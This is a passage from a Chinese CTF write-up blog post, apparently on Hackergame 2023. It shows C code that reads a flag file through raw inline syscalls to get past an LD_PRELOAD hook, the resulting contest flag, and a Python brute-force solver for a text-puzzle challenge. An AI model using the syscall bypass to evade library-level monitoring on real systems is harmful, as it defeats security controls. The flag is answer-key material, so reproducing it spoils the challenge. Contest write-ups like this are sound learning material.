        <span class="token operator">:</span> <span class="token string">"0"</span><span class="token punctuation">(</span>SYS_open<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"D"</span><span class="token punctuation">(</span><span class="token string">"./flag"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"S"</span><span class="token punctuation">(</span>O_RDONLY<span class="token punctuation">)</span>
        <span class="token operator">:</span> <span class="token string">"rcx"</span><span class="token punctuation">,</span> <span class="token string">"r11"</span><span class="token punctuation">,</span> <span class="token string">"memory"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token keyword">if</span> <span class="token punctuation">(</span>fd <span class="token operator">&lt;</span> <span class="token number">0</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token function">perror</span><span class="token punctuation">(</span><span class="token string">"open"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> EXIT_FAILURE<span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token comment">// 使用系统调用读取文件内容</span>
    <span class="token keyword">asm</span><span class="token punctuation">(</span><span class="token string">"syscall"</span>
        <span class="token operator">:</span> <span class="token string">"=a"</span> <span class="token punctuation">(</span>nread<span class="token punctuation">)</span>
        <span class="token operator">:</span> <span class="token string">"0"</span><span class="token punctuation">(</span>SYS_read<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"D"</span><span class="token punctuation">(</span>fd<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"S"</span><span class="token punctuation">(</span>buf<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"d"</span><span class="token punctuation">(</span><span class="token keyword">sizeof</span><span class="token punctuation">(</span>buf<span class="token punctuation">)</span><span class="token punctuation">)</span>
        <span class="token operator">:</span> <span class="token string">"rcx"</span><span class="token punctuation">,</span> <span class="token string">"r11"</span><span class="token punctuation">,</span> <span class="token string">"memory"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token keyword">if</span> <span class="token punctuation">(</span>nread <span class="token operator">==</span> <span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token function">perror</span><span class="token punctuation">(</span><span class="token string">"read"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">asm</span><span class="token punctuation">(</span><span class="token string">"syscall"</span>
            <span class="token operator">:</span>
        <span class="token operator">:</span> <span class="token string">"a"</span><span class="token punctuation">(</span>SYS_close<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"D"</span><span class="token punctuation">(</span>fd<span class="token punctuation">)</span>
            <span class="token operator">:</span> <span class="token string">"rcx"</span><span class="token punctuation">,</span> <span class="token string">"r11"</span><span class="token punctuation">,</span> <span class="token string">"memory"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> EXIT_FAILURE<span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token comment">// 输出文件内容</span>
    <span class="token function">fwrite</span><span class="token punctuation">(</span>buf<span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">,</span> nread<span class="token punctuation">,</span> <span class="token constant">stdout</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token comment">// 使用系统调用关闭文件</span>
    <span class="token keyword">asm</span><span class="token punctuation">(</span><span class="token string">"syscall"</span>
        <span class="token operator">:</span>
    <span class="token operator">:</span> <span class="token string">"a"</span><span class="token punctuation">(</span>SYS_close<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string">"D"</span><span class="token punctuation">(</span>fd<span class="token punctuation">)</span>
        <span class="token operator">:</span> <span class="token string">"rcx"</span><span class="token punctuation">,</span> <span class="token string">"r11"</span><span class="token punctuation">,</span> <span class="token string">"memory"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token keyword">return</span> EXIT_SUCCESS<span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>得到flag</p>
<pre class="line-numbers language-none"><code class="language-none">flag&#123;nande_ld_preload_yattano_a46091dfa1&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h2 id="惜字如金"><a href="#惜字如金" class="headerlink" title="惜字如金"></a>惜字如金</h2><p>咱是用枚举的方法，枚举一遍</p>
<pre class="line-numbers language-none"><code class="language-none">from itertools import product

# Constants
ROW1 &#x3D; &quot;nymeh1niwemflcir&#125;echaet&quot;
ROW2 &#x3D; &quot;a3g7&#125;kidgojernoetlsup?h&quot;
ROW3 &#x3D; &quot;ulw!f5soadrhwnrsnstnoeq&quot;
ROW4 &#x3D; &quot;ct&#123;l-findiehaai&#123;oveatas&quot;
ROW5 &#x3D; &quot;ty9kxborszstguyd?!blm-p&quot;
VOWEL &#x3D; &#123;&#39;a&#39;, &#39;e&#39;, &#39;i&#39;, &#39;o&#39;, &#39;u&#39;&#125;
CONSONANT &#x3D; &#123;&#39;b&#39;, &#39;c&#39;, &#39;d&#39;, &#39;f&#39;, &#39;g&#39;, &#39;h&#39;, &#39;j&#39;, &#39;k&#39;, &#39;l&#39;, &#39;m&#39;, &#39;n&#39;, &#39;p&#39;, &#39;q&#39;, &#39;r&#39;, &#39;s&#39;, &#39;t&#39;, &#39;v&#39;, &#39;w&#39;, &#39;x&#39;, &#39;y&#39;, &#39;z&#39;, &#39;!&#39;, &#39;?&#39;, &#39;-&#39;, &#39;&#123;&#39;, &#39;&#125;&#39;&#125;
TABLE &#x3D; [53, 41, 85, 109, 75, 1, 33, 48, 77, 90, 17, 118, 36, 25, 13, 89, 90, 3, 63, 25, 31, 77, 27, 60, 3, 118, 24, 62, 54, 61, 25, 63, 77, 36, 5, 32, 60, 67, 113, 28]

def add_variance(ori_str):
    variances &#x3D; set()
    for i, c in enumerate(ori_str):
        if c in CONSONANT:
            variances.add(ori_str[:i+1] + &#39;e&#39; + ori_str[i+1:])
            variances.add(ori_str[:i+1] + c + ori_str[i+1:])
    return list(variances)

def rev_get_str(str):
    return &#39;&#39;.join(str[TABLE[i] % len(str)] for i in range(len(TABLE)))

def is_format(str):
    return str.startswith(&quot;flag&#123;&quot;) and str.endswith(&#39;&#125;&#39;)

rows_variances &#x3D; [add_variance(ROW1), add_variance(ROW2), add_variance(ROW3), add_variance(ROW4), add_variance(ROW5)]

count &#x3D; 0
answers &#x3D; set()
for variances in product(*rows_variances):
    s &#x3D; &#39;&#39;.join(variances)
    rev &#x3D; rev_get_str(s)
    if is_format(rev) and rev not in answers:
        answers.add(rev)
        print(rev)
        count +&#x3D; 1


print(count)<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>


	  <div class="article-footer-copyright">
	Ciallo～(∠・ω< )⌒★
</div>

	</div>

	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/2024/01/02/cbctf/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2023/12/28/GeekChallenge2023/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2023-12-28 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/ctf/">ctf<span>56</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/ctf-writeup/">ctf writeup<span>56</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Hackergame-%E5%90%AF%E5%8A%A8"><span class="toc-article-text">Hackergame 启动</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E6%9B%B4%E6%B7%B1%E6%9B%B4%E6%9A%97"><span class="toc-article-text">更深更暗</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E7%8C%AB%E5%92%AA%E5%B0%8F%E6%B5%8B"><span class="toc-article-text">猫咪小测</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E8%B5%9B%E5%8D%9A%E4%BA%95%E5%AD%97%E6%A3%8B"><span class="toc-article-text">赛博井字棋</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E7%BB%84%E5%A7%94%E4%BC%9A%E6%A8%A1%E6%8B%9F%E5%99%A8"><span class="toc-article-text">组委会模拟器</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E8%99%AB"><span class="toc-article-text">虫</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#HTTP-%E9%9B%86%E9%82%AE%E5%86%8C-%E5%B7%AE%E4%B8%80%E4%B8%AA"><span class="toc-article-text">HTTP 集邮册[差一个]</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Git-Git"><span class="toc-article-text">Git? Git!</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Docker-for-Everyone"><span class="toc-article-text">Docker for Everyone</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#JSON-%E2%8A%82-YAML"><span class="toc-article-text">JSON ⊂ YAML?</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E5%A5%B6%E5%A5%B6%E7%9A%84%E7%9D%A1%E5%89%8D-flag-%E6%95%85%E4%BA%8B"><span class="toc-article-text">奶奶的睡前 flag 故事</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%F0%9F%AA%90-%E9%AB%98%E9%A2%91%E7%8E%87%E6%98%9F%E7%90%83"><span class="toc-article-text">🪐 高频率星球</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%F0%9F%AA%90-%E4%BD%8E%E5%B8%A6%E5%AE%BD%E6%98%9F%E7%90%83-%E5%B7%AE%E4%B8%80%E4%B8%AA"><span class="toc-article-text">🪐 低带宽星球[差一个]</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%F0%9F%AA%90-%E6%B5%81%E5%BC%8F%E6%98%9F%E7%90%83"><span class="toc-article-text">🪐 流式星球</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%F0%9F%AA%90-%E5%B0%8F%E5%9E%8B%E5%A4%A7%E8%AF%AD%E8%A8%80%E6%A8%A1%E5%9E%8B%E6%98%9F%E7%90%83"><span class="toc-article-text">🪐 小型大语言模型星球</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E6%89%93%E5%BC%80-flag-%F0%9F%98%A1-%E5%B7%AE%E4%B8%80%E4%B8%AA"><span class="toc-article-text">为什么要打开 &#x2F;flag 😡[差一个]</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#LD-PRELOAD"><span class="toc-article-text">LD_PRELOAD</span></a></li></ol></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#%E6%83%9C%E5%AD%97%E5%A6%82%E9%87%91"><span class="toc-article-text">惜字如金</span></a></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2025 nyyyddddn's Blog
  
      powered by <a href="http://hexo.io/" target="_blank">Hexo</a>.Theme <a href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
